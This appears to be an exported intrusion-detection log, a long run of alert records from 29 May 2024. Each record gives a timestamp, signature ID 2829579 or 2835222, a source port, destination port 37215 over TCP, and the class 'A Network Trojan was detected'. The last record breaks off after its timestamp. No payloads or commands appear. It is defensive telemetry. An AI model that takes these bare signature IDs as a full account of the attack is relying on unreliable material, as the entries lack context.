                Timestamp:05/29/24-15:16:03.223463
                SID:2829579
                Source Port:59410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.821136
                SID:2829579
                Source Port:55852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166121
                SID:2829579
                Source Port:35120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.128015
                SID:2835222
                Source Port:40464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901004
                SID:2829579
                Source Port:53484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981275
                SID:2835222
                Source Port:51996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791523
                SID:2835222
                Source Port:49778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512929
                SID:2835222
                Source Port:50944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897611
                SID:2835222
                Source Port:39126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712597
                SID:2829579
                Source Port:34096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868056
                SID:2835222
                Source Port:41702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858650
                SID:2835222
                Source Port:58408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515750
                SID:2835222
                Source Port:53490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518945
                SID:2835222
                Source Port:39352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136200
                SID:2835222
                Source Port:39304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900307
                SID:2829579
                Source Port:49468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782941
                SID:2829579
                Source Port:36480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.516089
                SID:2835222
                Source Port:45956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039838
                SID:2835222
                Source Port:56754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844753
                SID:2829579
                Source Port:57578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333623
                SID:2835222
                Source Port:53124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.811916
                SID:2835222
                Source Port:37930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319358
                SID:2835222
                Source Port:40274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223441
                SID:2829579
                Source Port:56882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831144
                SID:2835222
                Source Port:49340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561798
                SID:2829579
                Source Port:50082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.673384
                SID:2829579
                Source Port:38316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841298
                SID:2829579
                Source Port:54144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.961963
                SID:2829579
                Source Port:43214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414677
                SID:2835222
                Source Port:58294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990180
                SID:2829579
                Source Port:58544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716425
                SID:2835222
                Source Port:54984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652076
                SID:2835222
                Source Port:39310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180620
                SID:2835222
                Source Port:49054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321031
                SID:2829579
                Source Port:57018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.596778
                SID:2829579
                Source Port:58292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734581
                SID:2835222
                Source Port:34284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990302
                SID:2835222
                Source Port:46812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668972
                SID:2829579
                Source Port:57646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586817
                SID:2835222
                Source Port:41778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531614
                SID:2829579
                Source Port:46798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178786
                SID:2835222
                Source Port:47330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015878
                SID:2829579
                Source Port:35440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620350
                SID:2829579
                Source Port:44904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993030
                SID:2829579
                Source Port:42720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226967
                SID:2829579
                Source Port:38134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896312
                SID:2835222
                Source Port:45534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329486
                SID:2835222
                Source Port:38180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721853
                SID:2829579
                Source Port:37772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154303
                SID:2829579
                Source Port:39628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.930010
                SID:2835222
                Source Port:56650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166274
                SID:2835222
                Source Port:43170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779675
                SID:2835222
                Source Port:57238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639596
                SID:2829579
                Source Port:51670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518252
                SID:2835222
                Source Port:45636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984857
                SID:2835222
                Source Port:60050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984524
                SID:2829579
                Source Port:54884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.359886
                SID:2835222
                Source Port:42660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504768
                SID:2829579
                Source Port:35596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897202
                SID:2829579
                Source Port:48946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933145
                SID:2835222
                Source Port:48842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175123
                SID:2829579
                Source Port:36418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.848035
                SID:2829579
                Source Port:59198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533976
                SID:2829579
                Source Port:43014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781847
                SID:2829579
                Source Port:47782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689552
                SID:2835222
                Source Port:39432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868241
                SID:2835222
                Source Port:53364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180599
                SID:2835222
                Source Port:55372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787715
                SID:2829579
                Source Port:53286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811723
                SID:2829579
                Source Port:44928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916717
                SID:2829579
                Source Port:60002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.239685
                SID:2829579
                Source Port:45396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784267
                SID:2829579
                Source Port:58556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688133
                SID:2835222
                Source Port:46342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.821537
                SID:2835222
                Source Port:39492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215350
                SID:2835222
                Source Port:54086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438807
                SID:2829579
                Source Port:41890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278144
                SID:2835222
                Source Port:49982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111653
                SID:2829579
                Source Port:40538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977680
                SID:2835222
                Source Port:35408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420321
                SID:2835222
                Source Port:43492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166250
                SID:2829579
                Source Port:36248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528196
                SID:2835222
                Source Port:46710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466286
                SID:2829579
                Source Port:58186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795772
                SID:2829579
                Source Port:41766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088113
                SID:2829579
                Source Port:48766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915549
                SID:2835222
                Source Port:57632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652612
                SID:2835222
                Source Port:59400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948082
                SID:2829579
                Source Port:39726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663530
                SID:2829579
                Source Port:51774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209686
                SID:2835222
                Source Port:39930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571645
                SID:2829579
                Source Port:40578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281494
                SID:2835222
                Source Port:58358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.911190
                SID:2835222
                Source Port:37210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.823920
                SID:2835222
                Source Port:36652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672544
                SID:2835222
                Source Port:33164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731572
                SID:2829579
                Source Port:55230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968384
                SID:2829579
                Source Port:35812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810066
                SID:2829579
                Source Port:59830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981231
                SID:2829579
                Source Port:34192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796118
                SID:2835222
                Source Port:32970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931891
                SID:2829579
                Source Port:43922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765262
                SID:2829579
                Source Port:45512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941439
                SID:2835222
                Source Port:49316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165235
                SID:2829579
                Source Port:37696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557656
                SID:2835222
                Source Port:60462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876294
                SID:2829579
                Source Port:42324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901910
                SID:2829579
                Source Port:52864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712800
                SID:2829579
                Source Port:41008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945011
                SID:2829579
                Source Port:50502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.274518
                SID:2835222
                Source Port:58216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416652
                SID:2829579
                Source Port:45994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162780
                SID:2835222
                Source Port:48518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178326
                SID:2835222
                Source Port:36698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718801
                SID:2835222
                Source Port:42978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779846
                SID:2835222
                Source Port:60300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234244
                SID:2835222
                Source Port:51330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882883
                SID:2829579
                Source Port:34364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074874
                SID:2835222
                Source Port:35170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.149278
                SID:2835222
                Source Port:36068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100612
                SID:2835222
                Source Port:56730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977283
                SID:2835222
                Source Port:54568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782251
                SID:2835222
                Source Port:54332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224733
                SID:2829579
                Source Port:56920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557080
                SID:2835222
                Source Port:45066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556707
                SID:2835222
                Source Port:52572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212262
                SID:2835222
                Source Port:46784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731327
                SID:2829579
                Source Port:49036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688992
                SID:2835222
                Source Port:55452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.814671
                SID:2829579
                Source Port:43368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652768
                SID:2829579
                Source Port:40820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361695
                SID:2829579
                Source Port:41592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161019
                SID:2829579
                Source Port:41144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111102
                SID:2835222
                Source Port:45506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.231319
                SID:2835222
                Source Port:51648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582999
                SID:2829579
                Source Port:36960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689056
                SID:2835222
                Source Port:43002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815464
                SID:2829579
                Source Port:34372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212103
                SID:2829579
                Source Port:56142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521001
                SID:2829579
                Source Port:49802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842440
                SID:2829579
                Source Port:41442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689599
                SID:2829579
                Source Port:48136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.557266
                SID:2835222
                Source Port:37406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910847
                SID:2829579
                Source Port:48380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416784
                SID:2835222
                Source Port:56422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226905
                SID:2835222
                Source Port:59676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182479
                SID:2835222
                Source Port:46438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.865489
                SID:2835222
                Source Port:45948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442021
                SID:2835222
                Source Port:44620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519923
                SID:2835222
                Source Port:42154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701285
                SID:2829579
                Source Port:39498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321219
                SID:2829579
                Source Port:35720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133020
                SID:2835222
                Source Port:60286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178169
                SID:2835222
                Source Port:56160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.062633
                SID:2835222
                Source Port:36034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362582
                SID:2829579
                Source Port:51890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.059882
                SID:2829579
                Source Port:48960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655924
                SID:2835222
                Source Port:53520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929665
                SID:2829579
                Source Port:33510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505447
                SID:2835222
                Source Port:56608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583126
                SID:2829579
                Source Port:59854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224251
                SID:2829579
                Source Port:40708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362925
                SID:2829579
                Source Port:49114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.137039
                SID:2829579
                Source Port:50136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184434
                SID:2835222
                Source Port:41444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561738
                SID:2835222
                Source Port:57982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.702747
                SID:2829579
                Source Port:51090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361580
                SID:2835222
                Source Port:39740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555973
                SID:2835222
                Source Port:36740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.439208
                SID:2829579
                Source Port:35110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227082
                SID:2835222
                Source Port:60276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655802
                SID:2835222
                Source Port:53552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.323003
                SID:2829579
                Source Port:57070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292110
                SID:2829579
                Source Port:34516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586112
                SID:2829579
                Source Port:48614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782745
                SID:2835222
                Source Port:60998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166659
                SID:2829579
                Source Port:42048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711492
                SID:2835222
                Source Port:56756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436074
                SID:2829579
                Source Port:58282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731731
                SID:2829579
                Source Port:59344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001050
                SID:2835222
                Source Port:51148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.822489
                SID:2835222
                Source Port:49872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015618
                SID:2835222
                Source Port:54314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133821
                SID:2835222
                Source Port:43720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.964053
                SID:2829579
                Source Port:56996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.741678
                SID:2835222
                Source Port:44836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265871
                SID:2835222
                Source Port:33892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502644
                SID:2829579
                Source Port:41246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.866190
                SID:2835222
                Source Port:44832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072716
                SID:2835222
                Source Port:36750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160267
                SID:2829579
                Source Port:42616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.842570
                SID:2829579
                Source Port:55966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175636
                SID:2835222
                Source Port:38436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.734598
                SID:2835222
                Source Port:45814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614020
                SID:2835222
                Source Port:57660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.605197
                SID:2835222
                Source Port:43740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.649690
                SID:2829579
                Source Port:48278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767063
